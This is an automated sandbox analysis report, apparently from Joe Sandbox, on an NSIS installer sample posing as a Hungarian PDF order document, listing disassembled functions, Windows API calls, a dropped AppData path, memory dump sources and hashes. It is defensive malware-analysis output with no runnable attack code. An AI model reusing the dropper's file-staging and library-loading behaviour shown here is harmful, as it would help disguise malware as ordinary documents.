                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CloseValuelstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\nso4347.tmp
                                              • API String ID: 2655323295-3479845614
                                              • Opcode ID: ff438228ff69c0b1b81607afcdffde54d041ccdc3207ec43477f834cf4197262
                                              • Instruction ID: a134a75014e9aaf936f4ed277425746fec7608ee04f1c2dd62efd2514dae3daa
                                              • Opcode Fuzzy Hash: ff438228ff69c0b1b81607afcdffde54d041ccdc3207ec43477f834cf4197262
                                              • Instruction Fuzzy Hash: 15118471D00104BEEB10AFA5DE89EAEBA74EB44754F11803BF504B71D1D7B88D419B68
                                              Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C12
                                                • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
                                                • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F
                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                • Part of subcall function 004057BB: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE
                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations,?,00000000,000000F0), ref: 0040164D
                                              Strings
                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations, xrefs: 00401640
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Synthesizations
                                              • API String ID: 1892508949-1905350178
                                              • Opcode ID: 58aa6ed634d69523fe253ba31863865a35b3a84d19f8a0e45168ecad015ca2ca
                                              • Instruction ID: cdbb32f604e1e97b4505581c5a6dce2e2be8be56f1f537164db10111f90f244e
                                              • Opcode Fuzzy Hash: 58aa6ed634d69523fe253ba31863865a35b3a84d19f8a0e45168ecad015ca2ca
                                              • Instruction Fuzzy Hash: 5911D031504501EBCF30BFA4CD4199F36A0EF14329B29493BFA45B22F1DB3E49519A5E
                                              Function 00406DC3 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                              • Instruction ID: 28e39518df3801c38e3280a2e83f64e055c3b15caa2ea9a1a3761292ca1e3da9
                                              • Opcode Fuzzy Hash: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                              • Instruction Fuzzy Hash: F9A15371E04229CBDB28CFA8C8547ADBBB1FF44305F10816ED456BB281C7786A86DF45
                                              Function 00406FC4 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                              • Instruction ID: 90999bc76b255a60827136b2fd47affe8781ac3d45706895e3c6f95813f0c94e
                                              • Opcode Fuzzy Hash: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                              • Instruction Fuzzy Hash: 21913F71D04229CBDB28CF98C8547ADBBB1FF44305F14816ED456BB291C378AA86DF45
                                              Function 00406CDA Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                              • Instruction ID: 7ab5a6fdb7118453f5bc4abdeeb58a7f0a93ca16cb9ae78d5f3cb9c6a39904d0
                                              • Opcode Fuzzy Hash: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                              • Instruction Fuzzy Hash: 8E814471E04229DBDF24CFA8C8447ADBBB1FF44301F24816AD456BB291C778AA86DF15
                                              Function 004067DF Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                              • Instruction ID: 21cf7db9f51931c48f99e7e9547f5b24ff728e46d141457ef608e09f17fb8729
                                              • Opcode Fuzzy Hash: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                              • Instruction Fuzzy Hash: 4C815571D04229DBDB24CFA9D8447ADBBB0FB44301F2081AEE456BB281C7786A86DF55
                                              Function 00406C2D Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                              • Instruction ID: dacb8e277fcbb3a33cac5efaa2c5173e23fd2fcd6bf81bdfe6f06a7534410a90
                                              • Opcode Fuzzy Hash: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                              • Instruction Fuzzy Hash: 6C714371E04229CBDF24CF98C8447ADBBB1FF44305F14806AD446BB281C738AA86DF04
                                              Function 00406D4B Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                              • Instruction ID: 610106becc8cf73b6091924598cab7a4a25495cbbf2bb893dbe28c15679d0a85
                                              • Opcode Fuzzy Hash: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                              • Instruction Fuzzy Hash: 5C714271E04229CBDB28CF98C844BADBBB1FF44301F14816AD456BB291C738A986DF45
                                              Function 00406C97 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                              • Instruction ID: 65b73de0ce6de3c7b1653dbcc26eb67f08ce95b734c4b9eb4028e98c7b5a0113
                                              • Opcode Fuzzy Hash: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                              • Instruction Fuzzy Hash: 0B714371E04229DBEF28CF98C8447ADBBB1FF44305F11806AD456BB291C738AA96DF45
                                              Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                • Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                • Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                • Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll), ref: 00405359
                                                • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                              • String ID:
                                              • API String ID: 334405425-0
                                              • Opcode ID: 2e81291ab1750a8fcd1384059b07b9b97ccca7af317ac7dc5ac2b78b9278ec22
                                              • Instruction ID: 97d29300f9396016dda5dc64ca85157dedbc1c92ed1374a350dd7f5d7f4d946c
                                              • Opcode Fuzzy Hash: 2e81291ab1750a8fcd1384059b07b9b97ccca7af317ac7dc5ac2b78b9278ec22
                                              • Instruction Fuzzy Hash: BE21AF31D00205AACF20AFA5CE4899E7A70AF04358F60413BF511B11E0DBB98981DA6E
                                              Function 00401B77 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GlobalFree.KERNEL32(00787910), ref: 00401BE7
                                              • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Global$AllocFree
                                              • String ID: Call
                                              • API String ID: 3394109436-1824292864
                                              • Opcode ID: 7af67f2b39b2e1d4e89bd13aa3b917542ebe5618f9bf55d236d5d1ccadbbb379
                                              • Instruction ID: c71429250c0cafa7b5cd6a02bb6544c1a7146a0c31e36a2bf00ca42990a6d084
                                              • Opcode Fuzzy Hash: 7af67f2b39b2e1d4e89bd13aa3b917542ebe5618f9bf55d236d5d1ccadbbb379
                                              • Instruction Fuzzy Hash: 6E215472600141EBDB20FB94CE8595A73A4AB44318729057FF502B32D1DBB8A8919BAD
                                              Function 6FBC2A74 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileA.KERNELBASE(00000000), ref: 6FBC2B33
                                              • GetLastError.KERNEL32 ref: 6FBC2C3A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2603763082.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                              • Associated: 00000000.00000002.2603737645.000000006FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2603777952.000000006FBC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000000.00000002.2603791388.000000006FBC5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fbc0000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CreateErrorFileLast
                                              • String ID:
                                              • API String ID: 1214770103-0
                                              • Opcode ID: 0a9687c50f4e5f0afb6106cb20eab0450c75180bb3d9e09c7515272c0c022d98
                                              • Instruction ID: 0dd4e73ae91f1b71eb5efddd0548ce387bb2a146c3f92ab34230a575cf37af80
                                              • Opcode Fuzzy Hash: 0a9687c50f4e5f0afb6106cb20eab0450c75180bb3d9e09c7515272c0c022d98
                                              • Instruction Fuzzy Hash: 4F519D76444784DFDF24DFA5E940B9F37B4FB09328F11646AE805CB280C734A5A2CB56
                                              Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso4347.tmp,00000000,00000011,00000002), ref: 00402557
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue
                                              • String ID:
                                              • API String ID: 3356406503-0
                                              • Opcode ID: 78cb46a17e4604e5fda0a3152fe399088287bee99fe32485d92fc9a21df269c8
                                              • Instruction ID: d0975296e26d4c0b9efdbcb6ea02913ec0c3a4f45bebf2ca255a38b3541a69e3
                                              • Opcode Fuzzy Hash: 78cb46a17e4604e5fda0a3152fe399088287bee99fe32485d92fc9a21df269c8
                                              • Instruction Fuzzy Hash: CF11A731D14205EBDF14DF64CA585AE77B4EF44348F20843FE445B72D0D6B85A41EB5A
                                              Function 00405C61 Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                • Part of subcall function 00405C04: CharNextW.USER32(?,?,00425EF0,?,00405C78,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C12
                                                • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C17
                                                • Part of subcall function 00405C04: CharNextW.USER32(00000000), ref: 00405C2F
                                              • lstrlenW.KERNEL32(00425EF0,00000000,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405CBA
                                              • GetFileAttributesW.KERNELBASE(00425EF0,00425EF0,00425EF0,00425EF0,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00405CCA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
